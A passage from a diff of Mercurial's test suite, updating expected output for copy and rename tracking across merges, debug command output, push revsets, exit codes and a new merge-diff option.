no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")' M b A d @@ -1715,31 +3196,37 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 + o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' A d b (no-compatibility no-changeset !) + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")' A d b + A t + p R a R b + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")' A d b @@ -1749,6 +3236,586 @@ b R b $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")' + A t + p R a + R p $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' + A t + p R a + R p + +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +(see case declaration for details) + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) +- the merge add new change to b + + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#if no-changeset + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + 2f649fba7eb284e720d02b61f0546fcef694c045 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df +#else + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' + A f + d + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")' + A f + b + R b + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")' + A f + d + R b + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")' + A f + d (filelog !) + b (no-filelog !) + R b + R d + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' + A f + a + A t + p + R a + R b + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' + A f + a (filelog !) + b (no-filelog !) + A t + p + R a + R b + R p + + +Subcase: merge overwrite common copy information, but with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) + + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")' + M b + A d + h (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + h (changeset !) + h (compatibility !) + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' + M b + A d + h + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")' + M b + M d + i (no-filelog !) + R i + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")' + M b + M d + i (no-filelog !) + R i + +#if no-changeset + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + + +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +'a' is the the copy source of 'd' + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")' + M d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")' + M d + + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 'v'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'v' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + +The result from mPQm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v + A v + r (filelog !) + p (sidedata !) + p (upgraded !) + p (upgraded-parallel !) + + +The result from mQPm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQP,Sm")' v + A v + r (no-changeset no-compatibility !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v + A v + r (filelog !) + r (sidedata !) + r (upgraded !) + r (upgraded-parallel !) + + +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. + +reference output: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + R a + R p + +chained output + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' + M b + A d + a (no-changeset no-compatibility !) + A t + p + A unrelated-l + R a + R p + +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + +reference output: + + (for details about the filelog pick, check the mFGm/mGFm case) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d + A d + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + +Chained output + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mO,FGm")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d + A d + a (filelog !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d + A d + a (no-changeset no-compatibility !) + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d + A d + a (no-changeset no-compatibility !) + + +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +The result from mAEm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f + A f + a (filelog !) + a (sidedata !) + a (upgraded !) + a (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f + A f + a (no-changeset no-compatibility !) + + +The result from mEAm is the same for the subsequent merge: + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f + A f + a (filelog !) + b (sidedata !) + b (upgraded !) + b (upgraded-parallel !) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,11 +39,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #else $ hg debugformat -v @@ -53,11 +55,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #endif $ echo a > a @@ -345,7 +349,10 @@ $ hg co -q 0 $ hg mv a b $ hg ci -qm 'rename a to b' - $ hg rebase -d 1 --config rebase.experimental.inmemory=yes +Not only do we want this to run in-memory, it shouldn't fall back to +on-disk merge (no conflicts), so we force it to be in-memory +with no fallback. + $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes rebasing 2:* tip "rename a to b" (glob) merging a and b to b saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) @@ -421,11 +428,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -447,11 +456,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -475,11 +486,13 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -93,8 +93,10 @@ x y $ hg debugp1copies -r 1 x -> y -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> y (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> y Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -111,8 +113,10 @@ x x2 $ hg debugp1copies -r 1 x -> x2 -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> x2 (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> x2 Rename file in a loop: x->y->z->x $ newrepo @@ -374,6 +378,29 @@ $ hg debugpathcopies 1 3 x -> z +Copy x->y on two separate branches. Pathcopies from one branch to the other +should not report the copy. + $ newrepo + $ echo x > x + $ hg ci -Aqm 'add x' + $ hg cp x y + $ hg ci -qm 'copy x to y' + $ hg co -q 0 + $ hg graft 1 -q + $ hg l + @ 2 copy x to y + | y + | o 1 copy x to y + |/ y + o 0 add x + x + $ hg debugp1copies -r 1 + x -> y + $ hg debugp1copies -r 2 + x -> y + $ hg debugpathcopies 1 2 + $ hg debugpathcopies 2 1 + Copy x to y on one side of merge, create y and rename to z on the other side. $ newrepo $ echo x > x diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -228,6 +228,17 @@ should show no copies $ hg st -C +note: since filelog based copy tracing only trace copy for new file, the copy information here is not displayed. + + $ hg status --copies --change . + M bar + +They are a devel option to walk all file and fine this information anyway. + + $ hg status --copies --change . --config devel.copy-tracing.trace-all-files=yes + M bar + foo + copy --after on an added file $ cp bar baz $ hg add baz @@ -266,19 +277,25 @@ $ rm baz xyzzy -Test unmarking copy of a single file +Test unmarking copy/rename of a single file # Set up by creating a copy $ hg cp bar baz -# Test uncopying a non-existent file +# Test unmarking as copy a non-existent file $ hg copy --forget non-existent non-existent: $ENOENT$ -# Test uncopying an tracked but unrelated file + $ hg rename --forget non-existent + non-existent: $ENOENT$ +# Test unmarking as copy an tracked but unrelated file $ hg copy --forget foo foo: not unmarking as copy - file is not marked as copied -# Test uncopying a copy source + $ hg rename --forget foo + foo: not unmarking as copy - file is not marked as copied +# Test unmarking as copy a copy source $ hg copy --forget bar bar: not unmarking as copy - file is not marked as copied + $ hg rename --forget bar + bar: not unmarking as copy - file is not marked as copied # baz should still be marked as a copy $ hg st -C A baz @@ -287,17 +304,38 @@ $ hg copy --forget baz $ hg st -C A baz -# Test uncopy with matching an non-matching patterns + $ rm bar + $ hg rename --after bar baz + $ hg st -C + A baz + bar + R bar + $ hg rename --forget baz + $ hg st -C + A baz + R bar + $ hg revert bar +# Test unmarking as copy with matching an non-matching patterns $ hg cp bar baz --after $ hg copy --forget bar baz bar: not unmarking as copy - file is not marked as copied + $ hg cp bar baz --after + $ hg rename --forget bar baz + bar: not unmarking as copy - file is not marked as copied $ hg st -C A baz -# Test uncopy with no exact matches +# Test unmarking as copy with no exact matches $ hg cp bar baz --after $ hg copy --forget . $ hg st -C A baz + $ hg cp bar baz --after + $ hg st -C + A baz + bar + $ hg rename --forget . + $ hg st -C + A baz $ hg forget baz $ rm baz diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -186,8 +186,10 @@ node trie capacity: 4 node trie count: 2 node trie depth: 1 - node trie last rev scanned: -1 - node trie lookups: 4 + node trie last rev scanned: -1 (no-rust !) + node trie last rev scanned: 3 (rust !) + node trie lookups: 4 (no-rust !) + node trie lookups: 2 (rust !) node trie misses: 1 node trie splits: 1 revs in memory: 3 @@ -368,7 +370,8 @@ 7 1 8 1 9 1 - 10 2 + 10 2 (no-zstd !) + 10 1 (zstd !) 11 1 $ hg --config extensions.strip= strip --no-backup -r 1 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -636,7 +639,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -654,8 +656,10 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: 444 (no-rust !) + remote: 463 (rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -137,6 +137,7 @@ $ hg --config 'paths.default:pushrev=notdefined()' push pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) hg: parse error: unknown identifier: notdefined + (did you mean nodefromfile?) [10] $ hg --config 'paths.default:pushrev=(' push @@ -146,4 +147,40 @@ ^ here) [10] +default :pushrev is taking in account + + $ echo babar > foo + $ hg ci -m 'extra commit' + $ hg up '.^' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo celeste > foo + $ hg ci -m 'extra other commit' + created new head + $ cat >> .hg/hgrc << EOF + > [paths] + > other = file://$WD/../pushurldest + > *:pushrev = . + > EOF + $ hg push other + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + $ hg push file://$WD/../pushurldest + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + no changes found + [1] + +for comparison, pushing everything would give different result + + $ hg push file://$WD/../pushurldest --rev 'all()' + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + abort: push creates new remote head 1616ce7cecc8 + (merge or see 'hg help push' for details about pushing new heads) + [20] + $ cd .. diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -194,4 +194,105 @@ 9 10 +merge diff should show only manual edits to a merge: + + $ hg diff --config diff.merge=yes -c 6 +(no diff output is expected here) + +Construct an "evil merge" that does something other than just the merge. + + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge -r 5 + merging file.txt + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo 11 >> file.txt + $ hg ci -m 'merge 8 to y with manual edit of 11' # 7 + created new head + $ hg diff -c 7 + diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,6 +6,7 @@ + 5 + 6 + 7 + -8 + +y + 9 + 10 + +11 +Contrast with the `hg diff -c 7` version above: only the manual edit shows +up, making it easy to identify changes someone is otherwise trying to sneak +into a merge. + $ hg diff --config diff.merge=yes -c 7 + diff -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -9,3 +9,4 @@ + y + 9 + 10 + +11 + +Set up a conflict. + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ sed -e 's,^8$,z,' file.txt > file.txt.tmp + $ mv file.txt.tmp file.txt + $ hg ci -m 'conflicting edit: 8 to z' + created new head + $ echo "this file is new in p1 of the merge" > new-file-p1.txt + $ hg ci -Am 'new file' new-file-p1.txt + $ hg log -r . --template 'p1 will be rev {rev}\n' + p1 will be rev 9 + $ hg co 5 + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo "this file is new in p2 of the merge" > new-file-p2.txt + $ hg ci -Am 'new file' new-file-p2.txt + created new head + $ hg log -r . --template 'p2 will be rev {rev}\n' + p2 will be rev 10 + $ hg co -- 9 + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge -r 10 + merging file.txt + warning: conflicts while merging file.txt! (edit, then use 'hg resolve --mark') + 1 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon + [1] + $ hg revert file.txt -r . + $ hg resolve -ma + (no more unresolved files) + $ hg commit -m 'merge conflicted edit' +Without diff.merge, it's a diff against p1 + $ hg diff --config diff.merge=no -c 11 + diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt + --- /dev/null Thu Jan 01 00:00:00 1970 +0000 + +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -0,0 +1,1 @@ + +this file is new in p2 of the merge +With diff.merge, it's a diff against the conflicted content. + $ hg diff --config diff.merge=yes -c 11 + diff -r 5010caab09f6 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,12 +6,6 @@ + 5 + 6 + 7 + -<<<<<<< local: fd1f17c90d7c - test: new file + z + -||||||| base + -8 + -======= + -y + ->>>>>>> other: d9e7de69eac3 - test: new file + 9 + 10 + +There must _NOT_ be a .hg/merge directory leftover. + $ test ! -d .hg/merge +(No output is expected) $ cd .. diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -154,7 +154,7 @@ $ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default 0:cb9a9f314b8b $ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default @@ -166,7 +166,7 @@ $ HGPLAIN= hg log --config='hooks.pre-log=false' -b default abort: pre-log hook exited with status 1 - [255] + [40] $ HGPLAINEXCEPT= hg log --cwd .. -q -Ra -b default 0:cb9a9f314b8b diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ 